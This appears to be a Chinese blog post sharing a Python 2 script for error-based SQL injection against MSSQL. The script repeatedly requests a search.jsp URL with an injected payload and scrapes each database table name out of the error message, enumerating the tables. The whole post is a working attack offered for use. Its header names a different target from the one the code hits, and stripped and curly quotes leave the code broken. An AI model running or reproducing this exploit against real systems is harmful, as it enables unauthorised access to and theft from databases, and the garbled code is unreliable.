mssql-注入脚本

2022-03-05 05:40:11

#coding:utf-8
#Author:LSA
#Description:hishop sqli for /user/UserRefundApply?OrderId=
#Date:20190701
import sys
import requests
from bs4 import BeautifulSoup
import re
headers = {
Cookie: ‘‘,
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
}
global tables_name
tables_name = "‘XWCMFLOWACTION‘"
#print tables_name
def brute_tables(url):
for i in range(0,300):
url = http://www.xxx.com/search/search.jsp?doctitle=100%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20( + tables_name + ))%3E0--
print url
rsp = requests.get(url,headers=headers)
soup = BeautifulSoup(rsp.text,"lxml")
title = soup.p.text
print title
table_name = re.findall(r"‘(.*?)‘",title)
print table_name
print table_name[0]
global tables_name
tables_name = tables_name + ,\‘ + table_name[0] + \‘
print tables_name
def main(url):
brute_tables(url)
if __name__ == __main__:
url = http://www.xxx.com/search/search.jsp?doctitle=100%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20( + tables_name + ))%3E0--
main(url)

 

mssql-注入脚本

上一篇:org.sonar.squidbridge.api.AnalysisException: Please provide compiled classes of your project with sonar.java.binaries property


下一篇:JDBC的基础操作